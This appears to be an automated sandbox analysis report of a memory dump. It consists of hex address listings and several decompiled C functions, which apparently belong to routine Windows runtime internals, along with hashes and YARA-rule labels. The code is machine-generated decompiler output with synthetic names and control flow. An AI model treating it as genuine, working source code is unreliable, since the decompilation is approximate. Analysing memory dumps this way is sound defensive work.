0x02af5be8
0x02af5be9
0x02af5bee
0x02af5bf8
0x02af5bff
0x02af5c01
0x02af5c04
0x02af5c07
0x02af5c0b
0x02af5c0d
0x02af5c0d
0x02af5c15
0x02af5c18
0x02af5c1b
0x02af5c1b
0x02af5c1e
0x00000000
0x00000000
0x02ab28c3
0x02ab28c8
0x02ab28d2
0x02ab28d4
0x02ab28d8
0x02ab28db
0x02af5c26
0x02af5c28
0x02af5c2d
0x02af5c2d
0x00000000
0x00000000
0x02af5c34
0x02af5c36
0x02af5c49
0x02af5c4e
0x02af5c54
0x02af5c5b
0x02af5c5d
0x02af5c60
0x02ab2788
0x02ab2788
0x02ab278b
0x02ab278e
0x02ab278e
0x02ab278e
0x02ab2791
0x00000000
0x00000000
0x02ab2756
0x02ab2750
0x00000000
0x02ab2794
0x02ab2794
0x02ab2795
0x02ab2798
0x02ab2798
0x00000000
0x02ab2734
0x02ab272c
0x02ab2700
0x02ab25ef
0x02ab25ef
0x02ab25ef
0x02ab25f2
0x02ab25f8
0x00000000
0x00000000
0x02ab25fe
0x00000000
0x02ab28e6
0x02ab28ec
0x02ab28ef
0x02ab28f5
0x02ab28f8
0x02ab28f8
0x00000000
0x02ab28f8
0x00000000
0x00000000
0x02ab2866
0x02ab2866
0x02ab2876
0x02ab2879
0x00000000
0x00000000
0x02ab27e0
0x02ab27e7
0x02ab27e9
0x02ab27eb
0x02af5afd
0x00000000
0x02af5afd
0x00000000
0x00000000
0x02ab2633
0x02ab2638
0x02ab263b
0x02ab263c
0x02ab263e
0x02ab2640
0x02ab2642
0x02ab2647
0x02ab2649
0x02ab264e
0x02ab2650
0x02ab2653
0x02ab2659
0x02ab26a2
0x02ab26a7
0x02ab26ac
0x02ab26b2
0x02af5b11
0x02af5b15
0x02af5b17
0x00000000
0x02ab26b8
0x02ab26b8
0x02ab26ba
0x02ab27a6
0x02ab27a6
0x02ab27a9
0x02ab27ab
0x02ab27b9
0x02ab27b9
0x02ab27be
0x02ab27c1
0x02ab27c3
0x02ab27c5
0x02ab27c7
0x02af5c74
0x02af5c79
0x02af5c79
0x02ab27c7
0x00000000
0x02ab26c0
0x02ab26c0
0x02ab26c3
0x02ab26c6
0x02ab26c6
0x02ab26c9
0x02ab26c9
0x00000000
0x02ab26c9
0x02ab26ba
0x02ab265b
0x02ab265b
0x02ab265e
0x02ab2667
0x02ab266d
0x02ab2677
0x02ab267c
0x02ab267f
0x02ab2681
0x02af5b49
0x02af5b4e
0x02ab27cd
0x02ab27d0
0x02ab27d1
0x02ab27d2
0x02ab27d4
0x02ab27dd
0x02ab2687
0x02ab2687
0x02ab268a
0x02ab268b
0x02ab268e
0x02ab268f
0x02ab2691
0x02ab2696
0x02ab2698
0x02ab269d
0x02ab269f
0x00000000
0x02ab269f
0x02ab2681
0x00000000
0x00000000
0x02ab2846
0x00000000
0x00000000
0x02ab2605
0x02ab260a
0x02ab260c
0x02ab2611
0x02ab2616
0x02ab2619
0x02ab2619
0x02ab261e
0x00000000
0x02ab2624
0x02ab2627
0x02ab2627
0x00000000
0x00000000
0x02af5b1f
0x00000000
0x00000000
0x02ab2894
0x02ab289b
0x02ab289d
0x02ab28a1
0x02af5b2b
0x02af5b2e
0x02af5b2e
0x02ab28a7
0x02ab28a9
0x02af5b04
0x02af5b09
0x02af5b09
0x02af5b09
0x00000000
0x00000000
0x02af5b35
0x02af5b3c
0x02ab28fb
0x02ab28fb
0x02ab26cc
0x02ab26cc
0x02ab26d0
0x00000000
0x02ab26d2
0x02ab26d2
0x00000000
0x02ab26d2
0x00000000
0x00000000
0x02ab25fe
0x02ab292d
0x02ab292f
0x02ab2930
0x02ab2935
0x02ab2937
0x02ab293b
0x02ab293e
0x02ab293f
0x02ab2942
0x02ab2947
0x02ab294e
0x02ab294f
0x02ab2957
0x02ab295a
0x02ab2962
0x02ab2963
0x02ab2966
0x02ab296f
0x02ab2972
0x02ab2973
0x02ab297b
0x02ab297e
0x02ab297f
0x02ab2980
0x02ab2981
0x02ab2982
0x02ab2983
0x02ab2984
0x02ab2985
0x02ab2986
0x02ab2987
0x02ab2988
0x02ab2989
0x02ab298a
0x02ab298b
0x02ab298c
0x02ab298d
0x02ab298e
0x02ab298f
0x02ab2990
0x02ab2992
0x02ab2997
0x02ab29a3
0x02ab29a6
0x02ab29ab
0x02ab29ad
0x02ab29b0
0x02ab29b2
0x02af5c80
0x02ab29b8
0x02ab29b8
0x02ab29bb
0x02ab29c0
0x02ab29c5
0x02ab29c6
0x02ab29c6
0x02ab29c9
0x02ab29cb
0x00000000
0x00000000
0x02ab29cd
0x02ab29d0
0x02ab29d9
0x02ab29db
0x02ab29dd
0x02ab2a7f
0x02ab2a84
0x02ab2a87
0x02ab2a89
0x02af5ca1
0x02af5ca3
0x00000000
0x02ab2a8f
0x02ab2a8f
0x00000000
0x02ab2a8f
0x00000000
0x02ab29e3
0x02ab29e3
0x02ab29e3
0x00000000
0x02ab29e3
0x02ab29dd
0x00000000
0x02ab29db
0x02ab29e6
0x02ab29e9
0x02ab29eb
0x02ab29ed
0x02ab29f3
0x02ab29f5
0x02ab29f8
0x02ab29fa
0x02ab2a97
0x02ab2a9a
0x02ab2a9d
0x02ab2add
0x00000000
0x02ab2a9f
0x02ab2aa2
0x02ab2aa5
0x02ab2aa8
0x02ab2aab
0x02af5cab
0x02af5caf
0x02af5cc5
0x02af5cda
0x02af5cdc
0x02af5cdf
0x02af5ce5
0x00000000
0x02af5ceb
0x02af5ced
0x02af5cee
0x00000000
0x02af5cee
0x02af5cb1
0x02af5cb4
0x02af5cb9
0x02af5cbb
0x00000000
0x02af5cbd
0x02af5cbd
0x00000000
0x02af5cbd
0x02af5cbb
0x02ab2ab1
0x02ab2ab1
0x02ab2ac4
0x02ab2ac6
0x02ab2ac6
0x00000000
0x02ab2ac6
0x02ab2aab
0x00000000
0x02ab2a00
0x02ab2a09
0x02ab2a0e
0x02ab2a21
0x02ab2a24
0x02ab2a35
0x02ab2a3a
0x02ab2a3d
0x02ab2a42
0x02ab2a59
0x02ab2a59
0x02ab2a5c
0x02ab2a5f
0x02ab2a5f
0x02ab29fa
0x02ab29f3
0x02ab2a64
0x02ab2a64
0x02ab2a6b
0x02ab2a6b
0x02ab2a6d
0x02ab2a72
0x02ab2a72
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50f9e910bc92955e1d2cf42b817a31c5824a0bdb4e04b28dc9f883f2ceceae86
Instruction ID: 663df618f989b034667662586e909a3368c563287cfad16d7969fc9034f9c816
Opcode Fuzzy Hash: 50f9e910bc92955e1d2cf42b817a31c5824a0bdb4e04b28dc9f883f2ceceae86
Instruction Fuzzy Hash: 3681AF71D00208EFCB15CF99D980AEEBBB5FF48740F14806AE911EB651DB34A942CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02A8C600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E02A8C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x2b7d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E02A96D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E02ACB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x2b77b9c; // 0x0
					_t74 = L02AA4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E02AC9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L02AA77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E02ACF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E02AC13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L02AA77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E02AC9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x02a8c608
0x02a8c615
0x02a8c625
0x02a8c62d
0x02a8c635
0x02a8c640
0x02a8c680
0x02a8c687
0x02a8c688
0x02a8c689
0x02a8c694
0x02a8c694
0x02a8c642
0x02a8c64a
0x02a8c697
0x02af7a25
0x02af7a2b
0x02af7a2e
0x02af7a30
0x02af7bea
0x02af7bea
0x00000000
0x02af7bea
0x02af7a36
0x02af7a43
0x02af7a48
0x02af7a4c
0x02af7a4e
0x00000000
0x00000000
0x02af7a58
0x02af7a5a
0x02af7a5b
0x02af7a5c
0x02af7a5d
0x02af7a63
0x02af7a64
0x02af7a6a
0x02af7a6c
0x02af7a6e
0x02af79cb
0x02af79cb
0x02af79ce
0x02af79d0
0x02af7a98
0x02af7a9b
0x02af7a9b
0x02af7a9e
0x02af7aa1
0x02af7bbe
0x02af7bbe
0x02af7bc0
0x02af7be0
0x02af7be0
0x02af7a01
0x02af7a01
0x02af7a05
0x02af7a07
0x02af7a15
0x02af7a15
0x02af7a1a
0x00000000
0x02af7a1a
0x02af7bc2
0x02af7bc6
0x02af7bc9
0x02af7bcd
0x02af7bcf
0x02af79e6
0x02af79e6
0x02af79eb
0x02af79eb
0x02af79ef
0x02af79f1
0x00000000
0x00000000
0x02af79f3
0x02af79f5
0x02af79ff
0x02af79ff
0x00000000
0x02af79ff
0x02af79f7
0x02af79fd
0x00000000
0x00000000
0x00000000
0x02af79fd
0x02af7bd5
0x02af7bd8
0x00000000
0x00000000
0x02af7ba9
0x02af7bac
0x02af7bb0
0x02af7bb1
0x02af7bb1
0x02af7bb6
0x00000000
0x02af7bb6
0x02af7aa7
0x02af7aaa
0x00000000
0x00000000
0x02af7ab2
0x02af7ab3
0x02af7ab5
0x02af7aec
0x02af7aef
0x02af7b25
0x02af7b28
0x02af7b62
0x02af7b64
0x02af7b8f
0x02af7b92
0x02af7b96
0x02af7b98
0x00000000
0x00000000
0x02af7b9e
0x02af7b9f
0x02af7ba3
0x00000000
0x02af7ba3
0x02af7b66
0x02af7b68
0x02af7ae2
0x02af7ae2
0x00000000
0x02af7ae2
0x02af7b6e
0x02af7b72
0x02af7b75
0x02af7b81
0x02af7b85
0x02af7b87
0x00000000
0x00000000
0x02af7b31
0x02af7b34
0x02af7b3c
0x02af7b45
0x02af7b46
0x02af7b4f
0x02af7b51
0x02af7b57
0x02af7b59
0x02af7b59
0x00000000
0x02af7b59
0x02af7b77
0x00000000
0x02af7b77
0x02af7b2a
0x00000000
0x02af7b2a
0x02af7af1
0x02af7af3
0x00000000
0x00000000
0x02af7afb
0x02af7afc
0x02af7afe
0x00000000
0x00000000
0x02af7b00
0x02af7b03
0x00000000
0x00000000
0x02af7b05
0x02af7b09
0x02af7b0d
0x02af7b0f
0x00000000
0x00000000
0x02af7b18
0x02af7b1d
0x00000000
0x02af7b1d
0x02af7ab7
0x02af7ab9
0x00000000
0x00000000
0x02af7abf
0x02af7ac1
0x00000000
0x00000000
0x02af7ac3
0x02af7ac6
0x00000000
0x00000000
0x02af7ac8
0x02af7acc
0x02af7ad0
0x02af7ad2
0x00000000
0x00000000
0x02af7adb
0x00000000
0x02af7adb
0x02af79d6
0x02af79d9
0x02af79dc
0x02af7a91
0x02af7a94
0x00000000
0x02af7a94
0x02af79e2
0x00000000
0x02af79e2
0x02af7a74
0x02af7a7a
0x00000000
0x00000000
0x02af7a8a
0x02af7a21
0x02af7a21
0x00000000
0x02af7a21
0x02a8c650
0x02a8c651
0x02a8c656
0x02a8c65c
0x02a8c65d
0x02a8c663
0x02a8c664
0x02a8c66a
0x02a8c66e
0x02af79c5
0x02af79c7
0x00000000
0x02af79c7
0x02a8c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c0964c2c21dd4f8c0847ac881189f563b73f18cbe8e4fa234719ec049be73ec
Instruction ID: c39648336800f3a83aebaa5430baaace685c4aea1d13c20a55d514f4fa45e434
Opcode Fuzzy Hash: 9c0964c2c21dd4f8c0847ac881189f563b73f18cbe8e4fa234719ec049be73ec
Instruction Fuzzy Hash: 0E818F756443418BCBA5DF94CCC0B7AF3A5EB88354F15486AFE469B240DB38DD41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02B1B8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E02B1B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x2b77b9c; // 0x0
				_t124 = L02AA4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E02AC9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E02AC95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E02AC95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L02AA77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E02AC9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E02AC95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x2b77b9c; // 0x0
									_t92 = L02AA4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E02AC9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E02A8A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E02B1E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E02B1E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E02AC95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x02b1b8d9
0x02b1b8e4
0x00000000
0x02b1b8e6
0x02b1b8f3
0x02b1b8f5
0x02b1b8f5
0x02b1b8f8
0x02b1b920
0x02b1b924
0x02b1b936
0x02b1b939
0x02b1b93d
0x02b1b948
0x02b1b9a0
0x02b1b9a0
0x02b1b9a4
0x02b1b9bf
0x02b1b9c4
0x02b1b9c6
0x02b1b9cd
0x02b1b9d1
0x02b1bad4
0x02b1bad8
0x02b1bada
0x02b1badc
0x02b1badc
0x02b1badf
0x02b1bae0
0x02b1bae2
0x02b1bae4
0x02b1baec
0x02b1baee
0x02b1baf0
0x02b1baf0
0x02b1baec
0x02b1bafb
0x02b1bafc
0x02b1bafe
0x02b1bb01
0x02b1bb01
0x00000000
0x02b1bb06
0x02b1b9d7
0x02b1b9db
0x02b1b9db
0x02b1b9de
0x02b1b9de
0x02b1b9e4
0x02b1b9e7
0x02b1b9ea
0x02b1b9ec
0x02b1b9ef
0x02b1b9f3
0x02b1ba1b
0x02b1ba1b
0x02b1ba23
0x02b1ba24
0x02b1ba27
0x02b1ba2a
0x02b1ba2b
0x02b1ba2e
0x02b1ba30
0x02b1ba37
0x02b1ba3f
0x02b1ba9c
0x02b1baa2
0x02b1bb13
0x02b1bb15
0x02b1baae
0x02b1baae
0x02b1bab3
0x02b1bab5
0x02b1baba
0x02b1bac8
0x02b1bac8
0x02b1baba
0x02b1bacd
0x02b1bacf
0x00000000
0x02b1bacf
0x02b1bb1a
0x00000000
0x02b1bb1c
0x02b1baa7
0x02b1bb11
0x00000000
0x02b1bb11
0x02b1baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x02b1ba41
0x02b1ba41
0x02b1ba41
0x02b1ba58
0x02b1ba5d
0x02b1ba62
0x00000000
0x00000000
0x02b1ba64
0x02b1ba67
0x02b1ba68
0x02b1ba69
0x02b1ba6c
0x02b1ba6f
0x02b1ba71
0x02b1ba78
0x02b1ba80
0x00000000
0x00000000
0x02b1ba90
0x02b1ba90
0x02b1ba97
0x00000000
0x02b1ba97
0x02b1b9f5
0x02b1b9f7
0x02b1b9f7
0x02b1b9fa
0x02b1ba03
0x02b1ba07
0x02b1ba0c
0x02b1ba10
0x02b1ba17
0x00000000
0x02b1b9f7
0x02b1b9a6
0x02b1b9a8
0x02b1b9af
0x02b1b9b3
0x00000000
0x00000000
0x02b1b9b9
0x00000000
0x02b1b9b9
0x02b1b94d
0x02b1b98f
0x02b1b995
0x02b1b999
0x02b1b960
0x02b1b967
0x02b1b968
0x02b1b96a
0x00000000
0x02b1b96a
0x02b1b99b
0x02b1b99e
0x00000000
0x00000000
0x00000000
0x02b1b99e
0x02b1b951
0x02b1b954
0x02b1b95a
0x02b1b95e
0x02b1b972
0x02b1b979
0x02b1b97d
0x02b1b97f
0x02b1b980
0x02b1b982
0x02b1b984
0x00000000
0x02b1b984
0x00000000
0x02b1b926
0x00000000
0x02b1b926

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e6665f8dacd6b80271dfb30218131357b78b789851254f253c3ca2d54b1c1a
Instruction ID: d596091e12b00b394af67e50481936ff90e571606781565141538bb650fd7c30
Opcode Fuzzy Hash: a6e6665f8dacd6b80271dfb30218131357b78b789851254f253c3ca2d54b1c1a
Instruction Fuzzy Hash: 1F711D32240701EFDB218F24C980F6AB7A6EF44768F6049A8E6658B6E0DF70E945CB40

Uniqueness

Uniqueness Score: -1.00%

Function 02A852A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E02A852A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E02A9EEF0(0x2b779a0);
					_t104 =  *0x2b78210; // 0x2481e88
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E02A9EB70(_t93, 0x2b779a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E02AC9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E02A9EEF0(0x2b779a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E02A9EB70(0, 0x2b779a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x2481e95
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E02ABF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E02A9EEF0(0x2b779a0);
									__eflags =  *0x2b78210 - _t104; // 0x2481e88
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x2b78210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
